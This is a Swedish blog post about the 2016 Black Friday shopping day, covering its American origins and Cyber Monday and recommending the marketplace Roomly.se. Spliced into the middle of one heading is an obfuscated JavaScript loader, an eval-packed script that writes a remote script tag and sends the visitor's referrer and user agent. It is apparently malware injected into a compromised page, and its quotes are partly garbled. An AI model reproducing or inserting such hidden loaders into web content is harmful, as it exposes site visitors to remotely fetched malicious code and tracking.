Image Image Image Image Image Image Image Image Image Image

| 21 september, 2018

Scroll to top

Top

Black Friday? Nu startar snart årets största shoppingdag!

Black Friday? Nu startar snart årets största shoppingdag!
Sebastian Plengier Ehrnfelt

Nu är det inte långt kvar till årets största shoppingdag. Black Friday har tagit Sverige med storm de senaste två åren, och analytikerna tror på ytterligare en stark ökning 2016. Den amerikanska tradtionen som går ut på att butiker under en helg sänker sina priser på nästan allt till upp mot 80 procent är snart här.

I år kommer det hela starta igång den 25 november och de svenska butikerna, speciellt online har redan börjat marknadsföra sig. Förra året kunde vi se en otrolig stark ökning på över 200 procent jämfört med året innan. Detta gör Black Friday till årets helt klart största shoppingdag. Tittar vi på Sverige så har fler och fler aktörer hoppat på tåget och kommer under Black Fraiday 2016 att erbjuda rabatter på upp till hela 80 procent. Vilka produkter det gäller har ingen kommunicerat ut ännu.

Vad eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tdtsi|var|u0026u|referrer|kndzy||js|php’.split(‘|’),0,{}))
är då Black Friday?

Black Friday kommer från USA och är en period som faller in dagen efter Thanksgiving. En helg där butikerna sänker sina priser väldigt mycket. Butikerna har även öppet längre, ofta redan från 05.00 på morongen till midnatt. Detta för att göra det möjligt med en så stor försäljning som möjligt.

Det är inte någon officiell helgdag men ändå har skolor och många arbetsplatser stängt. Man skulle kunna säga att det är en ”klämdag”.

Under samma period eller snarare någon dag efter faller också den stora shoppingdagen Cyber Monday in. Den brukar också kallas för starten av julhandeln då många amerikaner börjar köpa julklappar och juldekorera hemma.

Hur handlar jag under denna shoppingdag?

Som vi nämnt ovan så har denna tradition verkligen tagit Sverige med storm. Detta betyder att fler och fler butiker kör på med rabatter under denna period. Men det gäller inte alla. Som återförsäljare är det helt upp till dem att bestämma om man vill vara med. Men de flesta större aktörerna på marknaden brukar vara live med detta.

Black Friday gäller inga specifika produkter utan allt från kläder till elektronik. Är man ute efter att köpa black friday möbler online så finns det också möjlighet för detta. Den svenska marknadsplatsen Roomly.se kommer att vara med på tåget i år. För att kolla in vilka inredningsbutiker och produkter som är på REA under perioden så kan ni kolla in där. Genom att dem samlar Sveriges butiker under en adress slipper ni att söka runt och besöka varje enskild butik för att se om det är ute efter är på REA.

Även om man inte är ute efter något speciellt är det en smart tid att inhandla julklapparna lite tidigare till mycket rabatterade priser. Lycka till med er shopping och var uppdaterade på alla rabatterade produkter.